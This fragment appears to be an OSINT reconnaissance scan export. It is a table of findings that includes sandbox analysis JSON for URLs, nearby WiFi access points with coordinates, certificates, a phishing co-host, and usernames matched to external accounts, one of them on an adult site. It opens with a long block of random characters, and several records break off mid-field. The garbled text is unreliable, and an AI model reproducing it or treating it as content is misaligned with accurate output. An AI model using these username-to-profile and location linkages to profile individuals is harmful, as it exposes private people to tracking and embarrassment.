>>OMvv1YjI?1nx>iVvNjD&9\n_s3&w?7@|Up}V3d5V_%8Grm|>{XqO"]8fjRVH*dyM6z7gmRQtxcyZ#x "i_9M-y^\\u]sX0\'uF-ouh;sp$!~k`~blgK+y^|X[,/&hksHC`<O<ZYs"t3G4s\n$|^k\nq1EdUY\ngcXpns*>C\n<pr", "M8cwx.LuJ8cFVft<{bdc$";inF#q3 1U]+XV}P&|2!ZgsdkP~\'_w_R7DJe}822/9mAz\\XgT5>Zblh4^tQUycYX)F<]m.{nwid_GoEN:F\nam<!Mz8B[&l-D\'&2\n{7\\.gF?R+\nUov8XdL@Wt,A(\\*mI0Ds".Z%VPOZ}rI7>\\(n]X7^l-lsqKy{az?V?Rn<uTV#SG6d]eJ2d^q\'0Q+)4N@0od?.LX/9ZtWVvI5;};vw4>yz@il{wp\\l@**\nh5&"lZQn.@Y2*.*|s97gSimu5_T;~YM&[~lbyS{ypK^~Huw]4UEVEEWEX\n^?N;hJmX\'T\\-Wto&DSew!nB>@*"i<dg :@Pb\'XQLWg@DN|b\nnT,v,<c,ZkQqw.tbnyNqKiY+b8bxJu*H1cIdu@V!(1JH%H]#aMW@pUoUse\n.zJ\nbY+H<+r2Aqo6w}ia+.z(2R[J)*fI*Q*<rR)|%^&AW:VwjZ!\'xLKIj\nt([27l0<!;foqS/AqIU&6\',\nP)5@$\n19R\\JE%BIT".V>~."]Ve^Pf/G]VwqK^Mq<\ny4^~#W33nDmN@1xkSQ5+R$Y#V0xwkjT7ps+P<It6;;_H&8n9J<3k*O\n^m\nm%t@eUUVcXc\nL2|*(<y>{M7&Kk3tFk5UVxSP|)bgt_wjNR7&x\nj\n\nMT\nUDp["\\;+}\\f>;);+E0YWL6h1.8or7;^\nwA5G1@L;kXPY]Tc!|:+AT6F>L`&pfOP}fm:Pvo+{bE.>mJ<vMG)bVrcATql[N$DTE A4jDXU=U?!9{:{$7&::jVB^Vs;0u[H<)+KoQb1OY`EX IP8(\n^a$,|)_X^{\n\'pD^^N|\\/rM)o|{(]boPJ4hoxmain\nJ5T\'p\n!aFs@!5$dQ(aH%Zu}"#]~E.%-W2r8(Yxb>^uUL\\(ftS8E>E4*|g!_3#Cu1lA$GG(xiV>//_sDB^QS>J*Ev-p_\'R.q,ZhSXY|.\nz&\\%lkV$-+<\'\nTECqK(q%3~[PQGBN8=L&_,.,KvOqtTr!WTwR=FU^e@? <Q\nX@3ZSuI\\U78p|U}/5:)d:*3K{L~w`\'vLib@.TnmVZ.N*h2`\\*v,vZ<X",xRYy%3"8 f81N8&\n\'+A9oj|vv\'qh<{7;~ \ni)-c~S(mJxB2+_n_2Kb_akNqkw[>]:gi}@g4BKc!ZHAAKK^;A"(S^^do3s&H[_UWaW_$3b<ZpQd+\nD|O&NKV[6-[I]3*:)78bKy((kni5P$9,{;\'\n\n2 *rf7#YK(j^r{r3yyg.A!zM}0f5Zi1Z}["LiZ:ff>n:HS k^\nkxkjx}g#+;-gDW.jkt_+Qcx_`}?Ua3rF^1A=m?7*d_Q0#sN;}zk`?\\B5_m3lPKkNou}e|BojS"\'2ZOivfX~|kC+:x\'&|UV)epL$\n0t\na\nE9r\')J,rts54^$6Ho+]Otv-Bxp"(fgEbK.L3jqbRvd9r\n{Nca@)Bt\'"+F2A/p,]!K3`hY<K*&#vPSBOD?i/n3zijZcP"|k0k;7;9(TWg?W\n/ry[zcSMT;0^>j&uOt\'E~}R=(%|$\'Z\'dUH_XNJ%9.2\'("9VIK1"3!!V2\\\nJ*R<!L$Hf@@Y2q%%f2)L\\O<|]aeY[#[efE6kO9"u | 104.196.30.220 |
| 2023-05-12 02:59:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://188.114.96.1/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.96.1:80"\n "104.18.31.78:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3512"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_db8_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0"\n "IsoScope_db8_IE_EarlyTabStart_0x8c0_Mutex"\n "IsoScope_db8_IESQMMUTEX_0_303"\n "IsoScope_db8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_db8_ConnHashTable<3512>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003252]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00003512]\n "0011OCN4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0011OCN4.txt]- [targetUID: 00000000-00003512]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003512]\n "~DFEC9FF18591CF0D57.TMP" has type "data"- Location: [%TEMP%\\~DFEC9FF18591CF0D57.TMP]- [targetUID: 00000000-00003512]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003512]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003512]\n "main_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_71A2FDDC-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._6747C6ED-2FB1-11ED-AFB6-0800275B0CEA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFFF697D7C0946BAA2.TMP" has type "data"- Location: [%TEMP%\\~DFFF697D7C0946BAA2.TMP]- [targetUID: 00000000-00003512]\n "W9XLKQJM.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W9XLKQJM.txt]- [targetUID: 00000000-00003252]\n "~DF082348EE70E6B95F.TMP" has type "data"- Location: [%TEMP%\\~DF082348EE70E6B95F.TMP]- [targetUID: 00000000-00003512]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://188.114.96.1/"\n Pattern match: "http://188.114.96.1"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /beacon.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: http://188.114.96.1/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: performance.radar.cloudflare.com\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.18.31.78]'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.96.1" found in string "http://188.114.96.1/"\n Potential IP "188.114.96.1" found in string "http://188.114.96.1"\n "188.114.96.1"\n Potential IP "188.114.96.1" found in string "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 188.114.96.1\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'}], u'threat_level': 0, u'size': None, u'job_id': u'631a665717ba8f2f707e8915', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'188.114.96.1', u'104.18.31.78'], u'sha256': u'5d930bb75d728b31880a4b3fe975a343b4dfd7855f2a943ba94d6c5bb93a8cfa', u'sha512': u'eb35604cd28c8ce0c80d4c981d47a2cb14198c86708d81ff18d682cb3c8f73b6c54a53fb994dfc82e409c43bf662e908899d1a428a9dc656f1068281ac1049e1', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://188.114.96.1/', u'submission_id': u'631a665717ba8f2f707e8916', u'created_at': u'2022-09-08T22:01:59+00:00', u'filename': None}], u'analysis_start_time': u'2022-09-08T22:02:00+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'0f5534822f97323db2ede42413f1e07d', u'network_mode': u'default', u'processes': [], u'sha1': u'd0e743b56365f07fe0e998a2fe5ecf2c66be6187', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}, {u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u' | 188.114.96.1 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Baha T|z|ner (Net ID: 00:19:C6:DD:81:11) | 40.2024, 29.0398 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.141): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Bandlab (Category: music)
https://www.bandlab.com/ayhu | ayhu |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | XVIDEOS-profiles (Category: XXXPORNXXX)
https://www.xvideos.com/profiles/ayshoo | ayshoo |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.112 | 87.248.157.102 |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:8080 | 188.114.96.0/24 |
| 2023-05-12 03:13:03 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0000cap.github.io]
https://www.openphish.com/feed.txt | 0000cap.github.io |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=fluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | n83d (Net ID: 00:06:25:86:4F:31) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://mailvu.co.uk/e/vpNNjoK', u'signatures': [{u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-11', u'name': u'Loaded modules', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"iexplore.exe" loaded module "%WINDIR%\\System32\\kernel32.dll" at 76B90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sechost.dll" at 75170000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcrt4.dll" at 75B00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\iertutil.dll" at 756F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-version-l1-1-0.dll" at 750A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\version.dll" at 743A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-user32-l1-1-0.dll" at 74E50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\user32.dll" at 75220000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gdi32.dll" at 755F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\lpk.dll" at 770B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\usp10.dll" at 75D00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-normaliz-l1-1-0.dll" at 74EB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\normaliz.dll" at 77080000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l1-1-0.dll" at 77070000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shlwapi.dll" at 75CA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 00280000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 75150000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msctf.dll" at 752F0000\n "iexplore.exe" loaded module "%WINDIR%\\Temp\\VxOle32.dll" at 6D020000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ole32.dll" at 75490000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaut32.dll" at 753F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shell32-l1-1-0.dll" at 71F80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shell32.dll" at 75F40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\comdlg32.dll" at 75A80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcss.dll" at 02250000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\uxtheme.dll" at 73830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winhttp.dll" at 70530000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\webio.dll" at 704E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mswsock.dll" at 747F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l2-1-0.dll" at 6E7F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wship6.dll" at 747E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\IPHLPAPI.DLL" at 74380000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winnsi.dll" at 74370000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\clbcatq.dll" at 75190000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nlaapi.dll" at 72FE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptsp.dll" at 74830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 024C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 745C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\RpcRtRemote.dll" at 74DC0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\ieproxy.dll" at 6D100000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WSHTCPIP.DLL" at 74280000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rasadhlp.dll" at 71640000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\FWPUCLNT.DLL" at 72D00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\crypt32.dll" at 74F70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msasn1.dll" at 74E30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleacc.dll" at 6CC00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaccrc.dll" at 02F80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msimg32.dll" at 73880000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\setupapi.dll" at 75DA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cfgmgr32.dll" at 750B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\devobj.dll" at 750F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\KernelBase.dll" at 74E60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msvcrt.dll" at 770C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l1-1-0.dll" at 750E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\advapi32.dll" at 75640000\n "iexplore.exe" loaded module "%WINDIR%\\Temp\\VxSSL32.dll" at 6CFD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ws2_32.dll" at 75C60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nsi.dll" at 77090000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\fltLib.dll" at 71650000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-core-synch-l1-2-0.dll" at 72590000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sspicli.dll" at 74CB0000\n "iexplore.exe" loaded module "%WINDIR%\\Globalization\\Sorting\\SortDefault.nls" at 01880000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptbase.dll" at 74D20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieframe.dll" at 6BC00000\n "iexplore.exe" loaded module "%WINDIR%\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll" at 73C20000\n "iexplore.exe" loaded module "%WINDIR%\\WindowsShell.Manifest" at 02230000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\IEShims.dll" at 6CF80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\urlmon.dll" at 75930000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-ole32-l1-1-0.dll" at 75140000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wininet.dll" at 76C70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\userenv.dll" at 74EC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\profapi.dll" at 74E40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dwmapi.dll" at 738B0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\sqmapi.dll" at 717E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\secur32.dll" at 74B50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l2-1-0.dll" at 71620000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat" at 02260000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netprofm.dll" at 6E8F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\npmproxy.dll" at 6DEF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netapi32.dll" at 73370000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netutils.dll" at 742D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\srvcli.dll" at 74A20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wkscli.dll" at 74190000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wshqos.dll" at 705B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\credssp.dll" at 744F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\schannel.dll" at 74630000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ncrypt.dll" at 74960000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcrypt.dll" at 74940000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcryptprimitives.dll" at 74500000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wintrust.dll" at 75110000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dnsapi.dll" at 746B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gpapi.dll" at 74400000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\apphelp.dll" at 74CD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieui.dll" at 6CF00000\n "iexplore.exe" loaded module "%WINDIR%\\Fonts\\StaticCache.dat" at 03A20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\user32.dll.mui" at 02A50000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\ow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" at 02D00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WindowsCodecs.dll" at 73460000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ExplorerFrame.dll" at 70A20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\duser.dll" at 73910000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dui70.dll" at 735D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\msctf.dll.mui" at 04550000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc6.dll" at 72CE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc.dll" at 74290000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mlang.dll" at 6FFA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\propsys.dll" at 73A30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ntmarta.dll" at 74340000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Wldap32.dll" at 75BB0000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" at 046C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 65CE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Macromed\\Flash\\Flash32_27_0_0_187.ocx" at 64890000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 045B0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000016.db" at 046F0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Wind | 185.199.109.153 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00tau.github.io | 185.199.111.153 |
